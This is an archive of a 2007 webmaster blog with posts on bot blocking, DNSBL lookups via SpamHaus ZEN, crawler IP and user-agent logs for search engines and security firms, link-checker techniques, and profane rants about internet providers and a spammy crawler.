Saturday, December 08, 2007

Validate Link Integrity Using DNSBL's like SpamHaus ZEN

People tend to just think that lists from sites like SpamHaus are only good for blocking spam from coming into your servers but that's just the tip of the iceberg if you're open to some creative thinking.

Since Google penalizes sites that link out to bad neighborhoods one potential use for SpamHaus ZEN is to help automatically identify bad sites and remove them. For people that run directories or have massive amounts of outbound links this means you can protect your visitors, as well as your reputation in Google and other places, via zen.spamhaus.org and eliminate links to IPs associated with spammers, 3rd party exploits, proxies, worms and trojans!

How's that for a kick ass way to clean up your site?

Keep in mind that on a shared server that a single IP address may represent multiple domains on a server. That means any domain on a server either spamming or otherwise compromised will impact all domains associated with that IP so many people may be effected that don't know there's a problem. However, since that server can be a hazard to the general population at large, it's best to err on the side of caution and suspend your association with all sites on that server until the problem is resolved.

Since most sites don't even know that they've been infected I merely quarantine those links until they are no longer being reported as hostile and then enable them again after they have been confirmed to be clean.

Not that everything will be listed in SpamHaus ZEN as much of the malicious activity I see isn't in their index, but it's a good reference for known bad sites.

Here's an example of how to check an IP address in SpamHaus using a spammers IP currently in the DNSBL.

Take the IP address 64.151.120.13 and reverse it to 13.120.151.64 and then combine the IP address to zen.spamhaus.org like this: 13.120.151.64.zen.spamhaus.org.

Using any DNS checking tool, query the DNSBL for the existence of 13.120.151.64.zen.spamhaus.org.

The IP is currently in the DNSBL you'll get a result like this:

host 13.120.151.64.zen.spamhaus.org
13.120.151.64.zen.spamhaus.org has address 127.0.0.2
If the IP address is not in the DNSBL you'll get a response like this:
host 13.120.151.123.zen.spamhaus.org
Host 13.120.151.123.zen.spamhaus.org not found: 3(NXDOMAIN)
The result codes from SpamHaus are as follows:
127.0.0.2 - SpamHaus Block List (SBL)
127.0.0.4-8 - Exploits Block List (XBL)
127.0.0.10-11 - Policy Block List (PBL)
The last list, the PBL, is probably something I wouldn't auto-block with a link checker or any other use (except anti-spam) unless I reviewed what it was blocking first so those errors, if they ever come up, are only set as "warnings" in my current implementation.

Thursday, December 06, 2007

Bad Behavior Needs Behavior Modification

WebGeek recently reported on Bad Behavior Behaving Badly where he got locked out of all his own blogs and was listed as an enemy of the state and put on the FBI's 10 most wanted geek list and all sorts of things.

OK, I'm exaggerating but read his post and it's close enough.

Anyway, there was something he mentioned about being concerned with:

"If left unattended in this state for a long time, a site could lose valuable search engine rankings, after the spiders of the Big 3 (Google, Yahoo, and MSN) find that they are locked out repeatedly with 403 errors."
Since he mentioned it, I've looked over the source code for Bad Behavior before and how they validate robots isn't something I'd put on my website because it relies solely on IP ranges alone and they are incomplete based on raw information I've collected from the crawlers themselves.

The search engines have clearly stated that they may expand into new IP ranges at any time without notice and the only official way to validate their main crawlers is with full round trip DNS checking to validate Googlebot for instance with IP ranges as a backup just in case they make a mistake.

So this code could easily be obsolete at any time:
if( stripos($ua, "Googlebot") !== FALSE || stripos($ua, "Mediapartners-Google") !== FALSE) {
require_once(BB2_CORE . "/google.inc.php");
}

// Analyze user agents claiming to be Googlebot
function bb2_google($package)
{
if (match_cidr($package['ip'], "66.249.64.0/19") === FALSE && match_cidr($package['ip'], "64.233.160.0/19") === FALSE) {
return "f1182195";
}
return false;
}
Even more importantly, I've tracked Google crawlers in the following IP ranges which is 2 more IP ranges than Bad Behavior has in their code!
64.233.160.0 - 64.233.191.255
66.249.64.0 - 66.249.95.255
72.14.192.0 - 72.14.239.255
216.239.32.0 - 216.239.63.255
The same criticism exists for validating the other bots in that Bad Behavior needs to have a little more robustness in the validation code so that it isn't accidentally blocking valid robots from indexing web pages. Unless I'm missing something I don't even see where Yahoo crawlers are specifically validated (I'm tracking 11 IP ranges for Yahoo) and MSNBOT was missing the 131.107.0.0/16 CIDR range, etc..

As it stands, the code doesn't have all the IP ranges that I've seen used for any of the major search engines so there is some risk, albeit not a big risk, that some legitimate search engine traffic is being bounced.

Not only that, but the MSIE validation is full of holes and most of the stealth crawlers I block will zip right through Bad Behavior and scrape the blog.

I think WebGeek is right, I would disable the add-in until those issues are resolved.

LiteFinder REALLY Go Fuck Yourself Now

In my opinion this whole LiteFinder Network Crawler is completely bogus.

Yesterday I commented on their crawler, which now just appears to be a ruse to lure people to their web site which is nothing but a big front for affiliate links.

Go to the LiteFinder home page and take a look at the main topics: Adult: Penis Enlargement, Online Gambling or the popular searches for "Phentermine" or "Breast Enlargement Pill".

Riiiiight.

This site is so spammy it would make Sanford Wallace blush.

The so-called search feature doesn't search shit, it just spits up a bunch of bullshit links.

Here's the results for a query on PLUMBING:

Shop
Browse and compare a great selection of .
www.somesite.com

Save up to 95% - diamond jewelry, engagement rings, designer watches, and much more. Live auctions starting at one dollar
somedomain.com

Gold, and Silver Jewelry
Great selection of jewelry including Rings, Necklaces, Bracelets, Pendants, Earrings, Body Jewelry, and Spazio watches.
somejewelry.com

Bored? Check Out the Sumo!
Viral video mayhem. Games Galore. Sucker free music. Bangin' Hotties. Animation for your fascination. Go to the Sumo, live large and never be disappointed by a weak video website again.
www.somesite.com

Etc. you get the idea...

What purpose is a crawler that doesn't feed a search engine?

You've got it, it's a lure, we've been had.

This LiteFinder Network Crawler thing just needs to be blocked, that's all there is to it.

Wednesday, December 05, 2007

LiteFinder Network Crawler Go Fuck Yourself

I don't get too riled up until I read some self-serving pompous bullshit like this that just makes the hair stand up on the back of my neck:

Can I learn the IP addresses, which LiteFinder Network Crawler comes from?
Unfortunately, You can't since it is against the rules of our company.
The user agent for this mess is:
"Mozilla/5.0 (compatible; LiteFinder/1.0; +http://www.litefinder.net/about.html)"
Since they don't feel like sharing the IP addresses, let me do the honors since it's not against MY company policy:
208.101.44.3 -> mybluewine.net.
209.160.65.42 -> hopone.net.
209.62.109.178 -> ev1s-209-62-109-178.ev1servers.net.
216.40.220.34 -> ev1s-216-40-220-34.ev1servers.net.
216.40.222.50 -> ev1s-216-40-222-50.ev1servers.net.
216.40.222.66 -> ev1s-216-40-222-66.ev1servers.net.
216.40.222.82 -> ev1s-216-40-222-82.ev1servers.net.
216.40.222.98 -> ev1s-216-40-222-98.ev1servers.net.
67.19.114.226 -> w103.networkharmony.com.
67.19.250.26 -> 1a.fa.1343.static.theplanet.com.
70.85.113.242 -> f2.71.5546.static.theplanet.com.
74.53.243.226 -> e2.f3.354a.static.theplanet.com.
74.53.243.242 -> f2.f3.354a.static.theplanet.com.
74.53.244.18 -> 12.f4.354a.static.theplanet.com.
74.53.249.34 -> 22.f9.354a.static.theplanet.com.
74.86.209.74 -> templatestill.com.
74.86.249.98 -> westhoste.net.
75.125.18.178 -> ev1s-75-125-18-178.ev1servers.net.
75.125.47.162 -> ev1s-75-125-47-162.ev1servers.net.
75.125.52.146 -> ev1s-75-125-52-146.ev1servers.net.
84.19.176.208 -> ns.km22118.keymachine.de.
87.118.118.111 -> ns.km31417.keymachine.de.
87.118.98.57 -> ns.km22427.keymachine.de.
87.118.98.62 -> ns.km22426.keymachine.de.

There you go, all the IPs I've seen them use and they can shove the rules of their company where the sun doesn't shine.

Surge Protection - Get it before it's TOO LATE!

I know many of you think surge protection is a bunch of hype but the father of a good friend just found out a few days ago that surge protection is a must have. Lightning apparently zapped their house and took out every single appliance, TVs, radios, computers and a nice big Wurlitzer organ all in one shot totaling over $20K in damages.

That was just enough to make me get off my ass and double check that all of our most expensive gear, like my computer, printers, big screen TV, DVRs, etc. were all plugged into the proper place on the UPS/Surge protector since the rainy season is starting in California.

For those of you that still have doubts about surge protection, and the odds that lightning will never hit your house, let me tell you about an old buddy of mine from Kansas City. He had a computer that got hit by lightning on the power line, fried the box. He went out and got a new computer and a surge protector for the electrical line. Then about a year later lightning hit the phone line and blew his computer apart when it came in via the modem. Again, he replaced the computer and this time put a surge protector on his phone line as well. Unfortunately, God didn't want him to have a computer and the 3rd time lightning shot in through the window and blew the computer off his desk. Last time I checked they don't make surge protectors for windows.

Anyway, if you don't have a surge protector for your electrical, phone and cable it's time to install one and move the computer away from the window so lightning can't easily blast it off your desk just to show you who's boss.

GEO Targeting Issues with Sprint Wireless Broadband

Testing my new Sprint Wireless Broadband turned up something that I didn't quite expect in regards to Geo targeting because the IP addresses used all are attributed to Southern California and I'm in Northern California.

I understand that privacy is a concern and you don't want people to know exactly where you are but being off by 600 miles is a bit much as nothing works right that tries to Geo target and some things can become down right annoying, such as AdSense showing you ads for local shit in Irvine California.

Nothing show stopping, just annoying.

Saturday, December 01, 2007

Comcast Dead While Sprint Hobbles Along

My connection to the internet has been so reliable for so many years that I had almost forgotten that the whole goddamn thing is cobbled together with bailing wire, band-aids and bubble gum.

Comcast in their infinite wisdom apparently did an upgrade to the network sometime Thursday afternoon and BOOM! the whole city went offline. When I called the message on their support line said people in my area just needed to power cycle the modem and it would reconnect. OK assholes, I had power cycled the fucking modem BEFORE I called for your tech support dept. to dole out bushels of meaningless platitudes and it still wasn't working so it's obvious I'm already fucked.

Tech support lady answered and asked me for my MAC address and in a couple of seconds confirmed that I was fucked and someone with a can of vasoline and some rubber gloves would be sent out the next morning to finish the job, er FIX the problem.

Next morning someone shows up right on time, which was an omen, and diagnoses the connection. Claimed everything was OK coming in so it must be the old modem, yeah right, whatever, swaps out the modem and gets us online and leaves.

Looks good, quick fix, right?

Wrong!

The new cable modem starts randomly taking a dump for a few minutes here and there and the next morning promptly decides to take a permanent dump and never comes back.

<SARCASM style: thick>
Yup, it was definitely the old modem having a problem.
</SARCASM>

So back to waiting online for the next technical support moron that knows way less about modems that I do, considering I've written software to drive a modem, which makes the idiotic conversation we're about to have not only insulting but maddening.

Here comes the idiot tech support questions:

TS: "Can you power cycle the modem for me?"
ME: "If that worked we wouldn't be on the phone at the moment!"

TS: "Do you have the modem connected directly to the computer or a hub?"
ME: "What does that matter? A stand alone cable modem plugged into Comcast alone will synch to the network if it can find the network, which it can't. Would you like me to explain to you what those lights mean on the front of the modem? I've got plenty of time since I can't get onto the internet and do any work..."

TS: "We can't seem to contact your modem from here so we'll need to send out a service technician."
ME: "Same problem as yesterday that you already 'fixed' once but we can try it again."

Anyway, they finally gave us a time for the next service technician to arrive tomorrow.

To be honest, if Comcast is down it shouldn't matter because our city is Wifi enabled!

Yeah, right, I'm on the border of the city's Wifi signal so I can see it every now and then but it's not strong enough to connect with.

However, a bunch of idiot neighbors have unprotected wireless networks that I could just hop on and use if I were that kind of guy, tempting but no thanks.

Anyway, here I site with ZERO faith in Comcast at the moment so I ran over to the Sprint store and picked up one of those nifty Wireless Broadband USB devices with an unlimited bandwidth plan for $60/month and a screaming [cough] 500kbps, but it beats dial-up.

Bring that new Sprint toy home, plug it in to the USB port, it self-installs and works out of the box without a hitch, sweet, right?

Well, it would be sweet except their fucking "Sprint Mobile Broadband Connection Manager" started crashing all the time. The application just blows up without warning, BLAMMO!, and down goes your connection. As a matter of fact, my computer NEVER crashes and this unstable software managed to lock up the PC to the point I had to do a cold reboot.

Guess I'll focus on the positive side that at least Sprint got me online, for some period of time, which is more than I can say for Comcast in the last few days.

They better get this shit fixed tomorrow because I'm bordering on going ballistic at the moment.

UPDATE: Comcast actually showed up on time and figured out the problem the second time and it was never the modem they replaced causing the problem, but what else is new.

Monday, November 19, 2007

Live.com's Search Spam Hysteria and Area 131.107.0.*

There are a lot of recent posts from people reaching a near hysteria fever pitch over what appears to be Live.com scouring the 'net looking for black hat sites doing things like cloaking or worse.

What they're all posting about appears to be that MS Live.com is doing some stealth crawling that appears to be sending bogus query strings looking for pages that change their response based on the query, which is what cloaked web sites do, and display advertising related to the topic that brought you to the page.

However, I've seen a few thousand other mysterious page requests from that IP range which most of you probably haven't noticed that I'll share below, which may or may not be related, hard to say at this point.

Sometimes, but not always, the IP address claims to be coming via a proxy such as:

1.1 SEA-PRXY-02
1.1 SEA-PRXY-01
"1.1 NET-PRXY-03, 1.1 NET-PRXY-04"
1.1 NET-PRXY-04
1.1 RED-PRXY-30
... and more
Maybe some of this is unrelated, maybe it's totally relevant, who knows except MS and they aren't telling. However, starting as far back as 01/07/2007 my bot blocker started trapping what appeared to be stealth crawl activity in the 131.107.*** range:
01/07/2007 131.107.0.96
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"

01/12/2007 131.107.0.95
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"

01/15/2007 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; I
nfoPath.1; .NET CLR 2.0.50727)"
Then it appears a human responded to a bot challenge:
01/15/2007 15:56:38 RESPONSE 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; In
foPath.1; .NET CLR 2.0.50727)"
Then this BLANK user agent started hitting on the same day
01/15/2007 131.107.0.86 ""
Then the sudden challenges and responses on 131.107.0.104 happened again so maybe that really was a human behind at least one of those proxies, who knows.

The blank UA on 131.107.0.86 kept asking for thousands of pages for many weeks, including "/robot.txt" that made me giggle.

In the middle of all this there's this little nugget:
03/29/200 131.107.0.96 "Wget/1.8.1"
Then in March there's another rash of challenge's in 131.107.0.* and a single response on 131.107.0.104:
04/28/2007 RESPONSE 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; In
foPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
What does it all mean? No clue yet...

Suddenly after months the blank UA's on the 131.107.0.104 megacrawl seem to come to a close.

Then we get this little gem:
05/30/2007 131.107.0.95 "LWP::Simple/5.805"
June has a mix of challenges and a couple of responses so humans may use that IP block every now and then.

Then these nuggets pop up:
07/10/2007 131.107.0.95 "Java/1.6.0_01"
07/10/2007 131.107.0.96 "Wget/1.8.1"
07/13/2007 131.107.0.86 "" the blank UA starts crawling again.
Blank UA shows up on other IPs:
07/23/2007 131.107.0.101 ""
07/23/2007 131.107.0.104 ""
07/23/2007 131.107.0.96 ""
07/24/2007 131.107.0.73 ""
07/26/2007 131.107.0.96 ""
07/27/2007 131.107.0.95 ""
Now one IP with blank UA crawls a few days:
10/16/2007 to 11/05/2007 131.107.0.104 ""
Then the PERL crawl begins:
11/15/2007 131.107.0.96 "libwww-perl/5.805"
11/16/2007 131.107.0.95 "libwww-perl/5.805"
And those last two IPs are still currently crawling as "libwww-perl/5.805" as I write this.

When you add it all up a couple of things that come to mind are that Microsoft is checking for cloaking, has some pet projects possibly being tested and/or they are checking to see how websites respond to a browser user agent vs. user agents that are normally blocked and it's probably a mix of all the above.

See the response from msndude msg#3442263 on WebmasterWorld:
First, we appreciate the concerns and issues that have been raised and apologize for any incovenience this might have caused.

Second, we want to explain what this is all about. The traffic you are seeing is part of a quality check we run on selected pages. While we work on addressing your conerns, we would request that you do not actively block the IP addreses used by this quality check; blocking these IP addresses could prevent your site from being included in the Live Search index.

Please keep the feedback and thoughts coming as we will use this to help improve this process and make sure that it impacts your sites as little as possible.
Please tell me what gives you the right to scan thousands of pages without permission and then threaten to dump our ass if we don't let you run rampant without control over our website?

That's some pretty big balls even for Microsoft!

Since it's annoying some people for no sane reason I say go block the IP range and go back to sleep because Microsoft doesn't send enough traffic to put up with this abuse in the first place.

Besides, Microsoft has some damned explaining to do before they have any room to bully people as I've got quite the list of documented abuse from that IP range that would justify anyone blocking the bad behavior exhibited on 131.107.0.*.

That's my $0.02.

FIRST LOOK: Yahoo Crawler Using Firefox UA

Woke up this morning to find my bot blocker had bitch slapped 300+ crawl attempts by Yahoo using the following criteria:

74.6.22.170 [llf520057.crawl.yahoo.net.] requested 302 pages as
"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071102 BonEcho/2.0.0.4"
Upon further examination it appears that this activity started on 11/17/2007 and the IP address used is a Yahoo proxy and some of the forwarded IPs were:
74.6.18.46 -> rz502516.crawl.yahoo.net.
74.6.18.160 -> rz502426.crawl.yahoo.net.
74.6.18.163 -> rz502429.crawl.yahoo.ne

a lot more 74.6.18.* IPs etc., you get the idea...
What was curious is the version of Firefox claimed to be Bon Echo which if I'm not mistaken was pre-release Firefox 2 code.

Didn't look like they were making screen shots based on todays activity unless they had already cached the images so I'm not sure what in the hell Yahoo's up to at this point.

Take a look in your logs as I find it hard to believe I'm the only one seeing this.

Saturday, November 17, 2007

Don't Just Block Spam, Block Spammers Too!

Most modern blog anti-spam efforts are based on just protecting the comment forms which is a very narrow focus. When some spambot or someone posts something bad it's automatically trapped and discarded by tools like Askimet. However, I don't think this solution goes far enough to solve the problem as it only puts a band-aid on the comments page.

What I'm going to suggest, which I recently did to a few of my sites, is to go a step beyond just the comments page and punish bad behavior with banishment.

Why not ban the spammer?

You've trapped the spam and you know he/she/it is up to no good so why let them continue to access your site at all?

What if tools like Askimet not only blocked the spam but locked the spammer out of every site running Askimet worldwide?

If Askimet and a bunch of the other anti-spam tools could pool their spammer data then you could effectively block them from ever accessing any website ever again.

Now THAT's how you punish a spammer, ban him from the worldwide community!

This is not a new concept as RBL lists have been used for things like this in the past as spammers IP's were not only used to block incoming mail but added to the server firewall as well. However, the more recent web-based technologies have tended to be very narrow focused and missed the bigger opportunity to thwart problem spammers in a better way such as ACCESS DENIED to the web in general.

Consider that many modern well protected websites that are cranking up security block access from data centers and proxy servers leaving spammers few options besides direct residential connections and botnets. Assuming spammers might rent out botnets it would have to be hijacked residential PC's since servers from blocked data centers won't do them much good being often blocked already. Therefore, assuming spammers were forced to use botnets to do their bidding, they would unwittingly block innocent people that would shortly discover their machines are infected and get them fixed.

What a concept!

Ostracizing spammers could even get people with compromised PC's off the botnet too!

Spammers would think twice about ever spamming again if each attempt permanently cost them more and more access to the web so maybe, just maybe, we can end spam in our lifetime just by changing the anti-spam technology being deployed as a complete front-end security system for the website after the comment form triggers the alarm and alerts the entire anti-spam community.

OK, there could be a few innocent casualties but the greater good to permanently eradicate spam and even botnets completely outweighs the impact of a little friendly fire.

I'm banning spammers to clean up the online environment, how about you?

Friday, November 16, 2007

Microsoft Crawling with Perl Script?

Wonder what the boys in Redmond are up to using Perl instead of one of their beloved Microsoft languages?

131.107.0.96 [tide526.microsoft.com.] requested 6 pages as "libwww-perl/5.805"
131.107.0.95 [tide525.microsoft.com.] requested 6 pages as "libwww-perl/5.805"

Makes you go Hmmmm...

Thursday, November 15, 2007

That Rant Wasn't About Anal Sex!

My heart warming Christmas rant from last year entitled "Good Will Toward Men but FUCK WOMEN DRIVERS" has almost ranked in the top 10 for anal sex under #8 for 'but fuck'.

Ah well, one "T" short of major porn affiliate ads running on the site.

Maybe next year we'll be blessed with a 'butt fuck' ranking.

Sigh, until then I can only dream of free porn money....

Sunday, November 11, 2007

Attributor Post-Mortem Copyright Compliance Revisited

My first post about the emergence of Attributor was about a year ago and I thought it was time to review and see what we've learned since then.

Here's where they've crawled from that we've spotted:

63.209.14.55 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Proxy VIA=1.1 ind27.attributor.com:3128 FORWARD=10.50.40.74

63.209.14.10 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Proxy VIA=1.1 ind25.attributor.com:3128 FORWARD=10.50.40.74

209.51.152.146 "Attributor.comBot"

66.231.188.172 "Attributor.comBot"

63.209.14.53 "Mozilla/5.0 (compatible; dejan/1.13.2 +http://www.attributor.com)"

63.209.14.7 "Mozilla/5.0 (compatible; dejan/1.13.2 +http://www.attributor.com)"

Now the amusing part is the IP 209.51.152.146 as it's a proxy and it appears they aren't any smarter than the rest of the bots as 340+ crawls have come via that IP this year including msnbot, Googlebot, Twiceler, Gigabot, Snapbot and some others so you're in fine company with other stupid crawlers out there.

What's curious is that 66.231.188.172 is one of Gigablast's IPs, and some of the others may be as well but they resolve to Level 3 blocks as do other Gigablast IPs, but I didn't look hard enough to confirm, lazy I guess.

Now let's examine one of my favorite statements on their website:
...you will no longer have to hold back top content or impose technical barriers on its viewing; instead, quality content can be made more easily available to a larger number of consumers.
Excuse me?

My technical barriers [not used on this blog] stop the problem in the first place just so I don't need to pay anyone to go chasing my content around the billions of pages on the web. As a matter of fact, my technical barriers are what trapped your crawl attempts above and identified what IP's your bots were using. That means your technology can't get past my technology so you'll never know if I'm stealing anyone's material but I'm pretty sure you aren't stealing my bandwidth finding out.

So now you have to ask yourself which method is easiest to stop content theft, blocking data centers and bulk downloaders on the fly or scanning billions of web pages looking for theft after the cows have already left the barn?

Bot blocking wins hands down as it's more cost effective without a doubt.

The best part is if someone wants to license your content you'll get 100% of the profits and not share with some company that wants to chase around the vast wasteland of the web looking for violators.

Maybe Attributor has some other places they crawl from without the user agent identifying the source, but that just means the bot blocker will stop and quarantine some anonymous IP address and we may never know it's really them.

Doesn't matter, I'm still banking on proactive content theft prevention technology and not reactive technology as it's easier to keep your cows at home when the fences are all closed and patrolled in the first place than try to round 'em up later.

Saturday, November 10, 2007

Websense Stealth Crawler Bypassing Security?

What I find amusing are security companies that claim to be protecting the web while violating access control measures on web servers all over the world.

Here's what I see coming from WebSense that's obvious:

208.80.193.29 Mozilla/5.0 (compatible; Konqueror/3.0-rc2; i686 Linux; 20020108)
208.80.193.30 Mozilla/5.0 (compatible; Konqueror/3.0-rc4; i686 Linux; 20020418)
208.80.193.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)
208.80.193.34 Mozilla/5.0 (compatible; Konqueror/3.1; i686 Linux; 20020213)
208.80.193.36 Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020328)
208.80.193.37 Mozilla/5.0 (compatible; Konqueror/3.1-rc4; i686 Linux; 20020520)
208.80.193.41 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312466)
208.80.193.42 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)
208.80.193.51 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312460)
208.80.193.52 Mozilla/5.0 (compatible; Konqueror/3.0-rc6; i686 Linux; 20020204)
It makes me wonder if deliberately trying to bypass security measures in place that are designed to keep robots like WebSense off a server, such as robots.txt, .htaccess and other access controls, may violate the "Computer Hacking and Unauthorized Access Laws"?

Proving they've been busily sneaking around on lots of servers won't be too hard either.

Maybe WebSense should just claim any site that blocks them is off limits since we don't want them on our servers instead of trying to circumvent our security measures.

That would make too much sense wouldn't it?

Of course someone could claim that bad sites would just cloak clean content if they know it's WebSense. However, I'd rather give explicit permission for WebSense and then it wouldn't bother me so much if they crawled in stealth from a different IP address knowing that I gave permission in the first place.

Here's some of their known IP ranges:
Websense 66.194.6.0 - 66.194.6.255
Websense 74.211.167.208 - 74.211.167.215
Websense, Inc 208.80.192.0 - 208.80.199.255
Not sure these are the same company as a couple are in Canada and the other is in a different city, but what the heck, make up your own mind on these:
Websense Inc 67.117.201.128 - 67.117.201.143
Websense Systems Inc. 64.69.80.104 - 64.69.80.111
Websense Systems Inc. 64.69.80.96 - 64.69.80.103
There you go, some good bot blocking to go with your morning coffee should start off a fine Monday!

Thursday, November 08, 2007

How to Super Charge Your Link Checker

Most external link checkers people use can only detect the simple problems with your links such as servers being offline, missing pages (404 errors), or some other type of server error making your outbound link technically broken. These old school link checkers don't know how to detect the myriad of soft 404 errors that send a "200 OK" as a result. Worse yet, traditional link checkers aren't smart enough to detect whether your outbound links have changed hands and are possibly in a domain park, converted to a porn site, or possibly contain malware.

Here's a few tips for those that may want to super charge your link checker to detect domains that have transitioned into domain parks or parked pages and catch those soft 404 errors.

1. Do a full trip DNS check on your domain names.

Example of a full trip DNS check: somedomain.com -> ip address -> somedomain.com

The resulting full trip DNS lookup for some domain parked sites return these domains:

landing.hitfarm.com.
sedoparking.com.
ddwww.tucows.com.
information.com.
Parked pages on GoDaddy are a bit more complex because it's a combination of parkwebwin + secureserver.net but not too terrible to interpret:
parkwebwin-v03.prod.mesa1.secureserver.net
2. Whois Lookup for more detailed information.

If the full trip DNS fails to uncover anything useful then getting the WHOIS information about the domain name and/or IP address might yield interesting results. You might find the site is hosted at Thoughtconvergence.com which runs trafficz.com, a domain park, or is hosted at Parked.com (duh!) or shows DNS servers such as NS1.PARKED.COM.

3. Examine the redirects and landing page names.

When you request the URL, assuming you process your own redirects, you can observe that certain types of soft 404 errors redirect to the home page of some servers or a standard default page served up by admin control panels. Additionally, some parked pages also have intermediate redirects that clearly identify the page is being redirected to a landing page which can also be trapped.

Some sites return a "200 OK" but the page lands on a page name like "404error.html" or "404.asp" and there are a large list of these. Unfortunately, just looking for any page with "404" in the page name will kick out many false positives but recording a list of these will help you quickly find a good list of them.

Some samples of various types of 404 pages and URLs you might find:
http_404_filenot_found.htm
erreur404.asp
decommissioned.php
/suspended.page/
4. Examine the page content

The least accurate method is to actually process the page content of the landing page to look for various fingerprints that can be used to detect a site gone bad. Simple phrases such as "this site is temporarily not available" or "this web site coming soon" can spot sites that are no longer active. The problem with this method is that the text fingerprints can easily be changed, may generate some false positives, and is the least reliable. However, it's often the final recourse to detecting 100s of bad pages so you just keep updating your list of fingerprints as you find them and manually double check these types of broken links for false positives.

5. Compare the previous WHOIS profile

Save copies of all the whois information you get during link checking and use it in future link checks to detect ownership changes. Assuming the link checker passes the site after all of the above profile checks, compare the current WHOIS information to the last time you checked the site. Odds are that if the site has changed hands it no longer contains the content you originally linked to and may be a link you want to remove.

Summary

Now you know all of my basic ingredients for building a super charged link checker and should have some ideas on how to spruce up your own link checker. Building the ultimate link checker is nothing simple that can be accomplished in a day nor does working on it ever stop because the internet is constantly changing. However, if you have a ton of outbound links or run a large directory a super charged link checker is the only way to check links and time spent building the link checker is far better than manually checking tens of thousands of links by hand.

Another Stealth Crawler via Extended Host

Here we go with another stealth crawler operating from Extended Host:

194.110.162.19 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.225 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.227 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.231 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.84 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.85 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.86 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.87 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.88 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.89 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.92 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.93 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.94 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.96 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Here's the Extended Host IP range:
inetnum: 194.110.160.0 - 194.110.163.255
netname: EXTHOST-NET
descr: Extended Host
They just keep coming and I just keep closing more holes they slither through.

Tuesday, November 06, 2007

Even MORE Stealth Crawling Hosted at Corporate Colo

Here's yet another stealth crawler that came from Corporate Colocations's IP range:

74.124.192.137 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.138 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.161 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.162 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.175 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.181 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.183 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.195 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.198 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.215 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Here's their list of IP ranges:
Corporate Colocation Inc. MZIMA01-CUST-CORPCOLO02
64.235.225.8 - 64.235.225.15

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO04
216.193.219.0 - 216.193.219.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO01
216.193.197.0 - 216.193.197.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO03
216.193.208.0 - 216.193.208.63

Corporate Colocation Inc. CORPCOLO-206-62-132-0-22
206.62.132.0 - 206.62.135.255

Corporate Colocation Inc. CORPCOLO-206-62-144-0-23
206.62.144. - 206.62.145.255

Corporate Colocation Inc. CORPCOLO-206-62-146-0-22
206.62.146.0 - 206.62.149.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO05
216.193.251.0 - 216.193.251.255

Corporate Colocation Inc. NET-216-152-242-0-24
216.152.242.0 - 216.152.242.255

Corporate Colocation Inc. CORPCOLO-NET
205.134.224.0 - 205.134.255.255

Corporate Colocation Inc. NET-216-151-149-0-24
216.151.149.0 - 216.151.149.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO10
72.37.152.0 - 72.37.152.255

Corporate Colocation Inc. MZIMA03-CUST-CORPCOLO09
72.37.131.80 - 72.37.131.87

Corporate Colocation Inc. CORPCOLO-NET02
66.117.0.0 - 66.117.15.255

Corporate Colocation Inc. CORPCOLO-NET03
